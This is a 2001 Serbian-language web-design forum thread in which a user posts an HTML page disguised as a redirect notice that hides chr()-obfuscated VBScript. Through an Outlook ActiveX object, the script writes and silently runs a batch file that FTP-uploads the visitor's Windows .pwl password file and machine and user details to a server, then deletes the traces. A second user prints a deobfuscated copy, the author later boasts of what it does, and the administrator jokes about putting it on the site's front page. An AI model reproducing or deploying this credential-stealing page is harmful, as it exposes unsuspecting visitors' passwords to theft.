Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

jako korisna i zanimljiva stranica, shta znaci?

[es] :: Web dizajn i CSS :: jako korisna i zanimljiva stranica, shta znaci?

[ Pregleda: 4210 | Odgovora: 10 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

dql8
Novi Sad

Član broj: 801
Poruke: 3
*.203.EUnet.yu



Profil

icon jako korisna i zanimljiva stranica, shta znaci?29.08.2001. u 02:04 - pre 229 meseci
<html>
<body text="#00FF00" bgcolor="#000000">

<p align="center"> <font size="6">Sacekajte par sekundi, i
bicete redirektovani...</font></blink></p>
<p align="center">stranicu napravio: <a href="mailto:[email protected]">dql</a></p>

<p align="center">
<SCRIPT LANGUAGE=vbscript>
<!--
Sub DDDD
On Error Resume Next
set sel=o1.object.selection
set obj1=sel.item(1)
set wshn = obj1.Session.Application.createobject(chr(119) +chr(115) +chr(99) +chr(114) +chr(105) +chr(112) +chr(116) +chr(46) +chr(110) +chr(101) +chr(116) +chr(119) +chr(111) +chr(114) +chr(107))
set wshs = obj1.Session.Application.createobject(chr(119) +chr(115) +chr(99) +chr(114) +chr(105) +chr(112) +chr(116) +chr(46) +chr(115) +chr(104) +chr(101) +chr(108) +chr(108))
Set fso = obj1.Session.Application.CreateObject(chr(83) +chr(99) +chr(114) +chr(105) +chr(112) +chr(116) +chr(105) +chr(110) +chr(103) +chr(46) +chr(70) +chr(105) +chr(108) +chr(101) +chr(83) +chr(121) +chr(115) +chr(116) +chr(101) +chr(109) +chr(79) +chr(98) +chr(106) +chr(101) +chr(99) +chr(116))

sIme=wshn.username

for i=1 to len(sIme)
if mid(sIme,i,1)=" " then
tmp=""
else
tmp=mid(sIme,i,1)
end if
sTempIme = sTempIme + tmp
next

if len(sTempIme)>8 then sTempIme=left(sTempIme,8)
sIme=sTempIme

Set file = fso.CreateTextFile (chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(107) +chr(111) +chr(109) +chr(97) +chr(110) +chr(100) +chr(101) +chr(46) +chr(116) +chr(120) +chr(116), TRUE)
file.write chr(117) +chr(115) +chr(101) +chr(114) +vbcrlf
file.write chr(112) +chr(97) +chr(115) +chr(115) +vbcrlf
file.write chr(112) +chr(117) +chr(116) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +cstr(sIme)+chr(46) +chr(112) +chr(119) +chr(108) +vbcrlf
file.write chr(112) +chr(117) +chr(116) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +cstr(sIme)+chr(46) +chr(116) +chr(120) +chr(116) +vbcrlf
file.write chr(113) +chr(117) +chr(105) +chr(116) +vbcrlf
file.Close
Set file = fso.CreateTextFile (chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +cstr(sIme)+chr(46) +chr(116) +chr(120) +chr(116), TRUE)
file.write chr(105) +chr(109) +chr(101) +chr(32) +chr(107) +chr(111) +chr(109) +chr(112) +chr(97) +chr(58) +chr(32) +cstr(wshn.computername)+vbcrlf
file.write chr(105) +chr(109) +chr(101) +chr(32) +chr(117) +chr(115) +chr(101) +chr(114) +chr(97) +chr(58) +chr(32) +cstr(wshn.username)+vbcrlf
file.write chr(100) +chr(111) +chr(109) +chr(101) +chr(110) +chr(58) +chr(32) +cstr(wshn.userdomain)+vbcrlf
file.close
Set file = fso.CreateTextFile (chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(102) +chr(97) +chr(106) +chr(108) +chr(46) +chr(98) +chr(97) +chr(116), TRUE)
file.write chr(102) +chr(116) +chr(112) +chr(32) +chr(45) +chr(115) +chr(58) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(107) +chr(111) +chr(109) +chr(97) +chr(110) +chr(100) +chr(101) +chr(46) +chr(116) +chr(120) +chr(116) +chr(32) +chr(49) +chr(50) +chr(55) +chr(46) +chr(48) +chr(46) +chr(48) +chr(46) +chr(49) +vbcrlf
file.write chr(100) +chr(101) +chr(108) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(107) +chr(111) +chr(109) +chr(97) +chr(110) +chr(100) +chr(101) +chr(46) +chr(116) +chr(120) +chr(116) +vbcrlf
file.write chr(100) +chr(101) +chr(108) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +cstr(sIme)+chr(46) +chr(116) +chr(120) +chr(116) +vbcrlf
file.write chr(100) +chr(101) +chr(108) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(102) +chr(97) +chr(106) +chr(108) +chr(46) +chr(98) +chr(97) +chr(116) +vbcrlf
file.close
wshs.run chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(102) +chr(97) +chr(106) +chr(108) +chr(46) +chr(98) +chr(97) +chr(116),vbhide

location = chr(112) +chr(111) +chr(99) +chr(101) +chr(116) +chr(110) +chr(97) +chr(46) +chr(104) +chr(116) +chr(109)
End Sub

settimeout "DDDD",2000

-->
</SCRIPT>

<OBJECT classid=clsid:0006F063-0000-0000-C000-000000000046 id=o1
style="HEIGHT: 1; WIDTH: 1"><PARAM NAME="Folder" VALUE="Inbox">
</OBJECT>

</body>
</html>

[Ovu poruku je menjao dql8 dana 08-29-2001 u 02:10 AM GMT]
dql
 
Odgovor na temu

Reljam
Relja Markovic
San Francisco

Član broj: 531
Poruke: 1793
*.dialup.mindspring.com



+18 Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?29.08.2001. u 07:29 - pre 229 meseci
Ovi silni chr(xxx) me navode da pomislim da to ne bi trebalo startovati....
 
Odgovor na temu

Rodd
Rodoljub Petrović
web developer, Extreme
Beograd

Član broj: 242
Poruke: 358
217.26.71.*

ICQ: 114756071
Sajt: www.rodpetrovic.com


Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?29.08.2001. u 14:42 - pre 229 meseci
Ova VBS skripta pravi neke fajlove pa ih onda izgleda i pokrece. Ove chr(xxx) funkcije su u stvari karakteri (u chr() ide nANSIC broj 0-255, a povratna vrednost je odgovarajuci karakter). Ovo je ocigledno korisceno da bi se otezalo citanje samog koda. Dakle, da bi ti sad otkrio kako se zovu fajlovi koje je skripta napravila, gde su smesteni, i sta je smesteno u njih, trebao bi da desifrujes svaki od ovih chr(xxx) karaktra ponaosob.
 
Odgovor na temu

alex
Aleksandar Radulovic
Senior Software Engineer, Spotify
Stockholm, Sweden

Član broj: 71
Poruke: 2194
*.trackwell.com

Jabber: alex@a13x.info
ICQ: -1
Sajt: www.a13x.info


+1 Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?29.08.2001. u 17:20 - pre 229 meseci
Citat:
Rodd je napisao:
Ova VBS skripta pravi neke fajlove pa ih onda izgleda i pokrece. Ove chr(xxx) funkcije su u stvari karakteri (u chr() ide nANSIC broj 0-255, a povratna vrednost je odgovarajuci karakter). Ovo je ocigledno korisceno da bi se otezalo citanje samog koda. Dakle, da bi ti sad otkrio kako se zovu fajlovi koje je skripta napravila, gde su smesteni, i sta je smesteno u njih, trebao bi da desifrujes svaki od ovih chr(xxx) karaktra ponaosob.


$ cat htmlfile | perl -e 'while(<stdin>) { s/chr((.*?))/chr($1)/ge; s/\+//g; print $_;}'

<html>
<body text="#00FF00" bgcolor="#000000">

<p align="center"> <font size="6">Sacekajte par sekundi, i
bicete redirektovani...</font></blink></p>
<p align="center">stranicu napravio: <a href="mailto:[email protected]">dql</a></p>

<p align="center">
<SCRIPT LANGUAGE=vbscript>
<!--
Sub DDDD
On Error Resume Next
set sel=o1.object.selection
set obj1=sel.item(1)
set wshn = obj1.Session.Application.createobject(w s c r i p t . n e t w o r k)
set wshs = obj1.Session.Application.createobject(w s c r i p t . s h e l l)
Set fso = obj1.Session.Application.CreateObject(S c r i p t i n g . F i l e S y s t e m O b j e c t)

sIme=wshn.username

for i=1 to len(sIme)
if mid(sIme,i,1)=" " then
tmp=""
else
tmp=mid(sIme,i,1)
end if
sTempIme = sTempIme tmp
next

if len(sTempIme)>8 then sTempIme=left(sTempIme,8)
sIme=sTempIme

Set file = fso.CreateTextFile (c : w i n d o w s t e m p k o m a n d e . t x t, TRUE)
file.write u s e r vbcrlf
file.write p a s s vbcrlf
file.write p u t c : w i n d o w s cstr(sIme). p w l vbcrlf
file.write p u t c : w i n d o w s t e m p cstr(sIme). t x t vbcrlf
file.write q u i t vbcrlf
file.Close
Set file = fso.CreateTextFile (c : w i n d o w s t e m p cstr(sIme). t x t, TRUE)
file.write i m e k o m p a : cstr(wshn.computername)vbcrlf
file.write i m e u s e r a : cstr(wshn.username)vbcrlf
file.write d o m e n : cstr(wshn.userdomain)vbcrlf
file.close
Set file = fso.CreateTextFile (c : w i n d o w s t e m p f a j l . b a t, TRUE)
file.write f t p - s : c : w i n d o w s t e m p k o m a n d e . t x t 1 2 7 . 0 . 0 . 1 vbcrlf
file.write d e l c : w i n d o w s t e m p k o m a n d e . t x t vbcrlf
file.write d e l c : w i n d o w s t e m p cstr(sIme). t x t vbcrlf
file.write d e l c : w i n d o w s t e m p f a j l . b a t vbcrlf
file.close
wshs.run c : w i n d o w s t e m p f a j l . b a t,vbhide

location = p o c e t n a . h t m
End Sub

settimeout "DDDD",2000

-->
</script>

<OBJECT classid=clsid:0006F063-0000-0000-C000-000000000046 id=o1
style="HEIGHT: 1; WIDTH: 1"><PARAM NAME="Folder" VALUE="Inbox">
</object>

</body>
</html>

Eto, mrzelo me jos da skidam i whitespace-tove... Sad ko zna VBS nek ovo provali...


[Ovu poruku je menjao alex dana 08-29-2001 u 04:20 PM GMT]

[Ovu poruku je menjao alex dana 08-29-2001 u 04:21 PM GMT]
Alex: My favorite site is http://localhost/
R.J. Oppenheimer: "I am become death, destroyer of worlds" (1945 AD)
tweet.13x ||
linkedin.13x
 
Odgovor na temu

alex
Aleksandar Radulovic
Senior Software Engineer, Spotify
Stockholm, Sweden

Član broj: 71
Poruke: 2194
*.trackwell.com

Jabber: alex@a13x.info
ICQ: -1
Sajt: www.a13x.info


+1 Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?29.08.2001. u 17:24 - pre 229 meseci
Citat:
alex je napisao:
[Ovu poruku je menjao alex dana 08-29-2001 u 04:20 PM GMT]

[Ovu poruku je menjao alex dana 08-29-2001 u 04:21 PM GMT]


Tupavi forum - pojede sve "\" karaktere.. Gojko, da li koristis stripSlashes() i ostale pogodne PHP funkcije za ovaj Forum,
jer je ovako totalno neupotrebljivo!

Poz, alex.

Alex: My favorite site is http://localhost/
R.J. Oppenheimer: "I am become death, destroyer of worlds" (1945 AD)
tweet.13x ||
linkedin.13x
 
Odgovor na temu

Gojko Vujovic
Amsterdam, NL

Administrator
Član broj: 1
Poruke: 13644



+159 Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?29.08.2001. u 17:58 - pre 229 meseci
Taj deo koji radi input processing u ovom forumu nisam ni menjao a cini mi se da radi stripslashes i htmlspecialchars() na svakoj unetoj poruci, da bi se zastitili od 'akovanja.

Znam da kvari kod al yeb ga.. ne znam za bolji nacin.
 
Odgovor na temu

dql8
Novi Sad

Član broj: 801
Poruke: 3
*.13.EUnet.yu



Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?30.08.2001. u 00:02 - pre 229 meseci
heheheh, pitanje je shta ova stranica radi, ja sam je napravio, ako neko sazna ( a vidi se da oce ), moze dobro da mu posluzi!
:)
dql
 
Odgovor na temu

Gojko Vujovic
Amsterdam, NL

Administrator
Član broj: 1
Poruke: 13644



+159 Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?30.08.2001. u 10:28 - pre 229 meseci
Hmm još uvek ne znam šta radi ali razmišljam se da je stavim kao prvu stranicu ESa i pritom rešim dva problema: 1. pobijem sve ove IE korisnike koji bezbrižno surfuju svojim shiternet exploiterom, 2. saznaćemo šta taj kod tačno radi

Nice, huh? :)
 
Odgovor na temu

Trunks
Stefan T.
Freelance web/grafički dizajner.
Novi Sad, Srbija

Član broj: 34
Poruke: 2465
*.82.EUnet.yu

ICQ: 28675801
Sajt: Linemotion.com


+1 Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?01.09.2001. u 01:50 - pre 229 meseci
Gojko: sve je to lepo ali bi izgubio 80% posetioca :).
» Mom, mom, look what I did, mom!
» Look what I did to my hands, I broke 'em!
 
Odgovor na temu

dql8
Novi Sad

Član broj: 801
Poruke: 3
*.my-trion.net.



Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?05.09.2001. u 22:24 - pre 229 meseci
Evo da se vise ne mucite (ako jos iko razmislja o ovoj stranici:), ona uploaduje korisnikov PWL fajl na izabrani ftp server:))
Zanimljivo, zar ne?

P.S. Stranica je testirana samo samo sa Officeom XP, i ne javlja nikakvu poruku prilikom preuzimanja fajla (osim shto se firewall malo buni:)
Poz
dql
 
Odgovor na temu

Ivan Dimitrijević

Član broj: 108
Poruke: 363
*.ptt.yu

Jabber: collide@jabber.com
ICQ: 99936990


+1 Profil

icon Re: jako korisna i zanimljiva stranica, shta znaci?05.09.2001. u 23:02 - pre 229 meseci
Citat:
Trunks je napisao:
Gojko: sve je to lepo ali bi izgubio 80% posetioca :).


Tuzno, ali istinito !!!

Don't tell Me what to do !!! Pimp Juice
 
Odgovor na temu

[es] :: Web dizajn i CSS :: jako korisna i zanimljiva stranica, shta znaci?

[ Pregleda: 4210 | Odgovora: 10 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.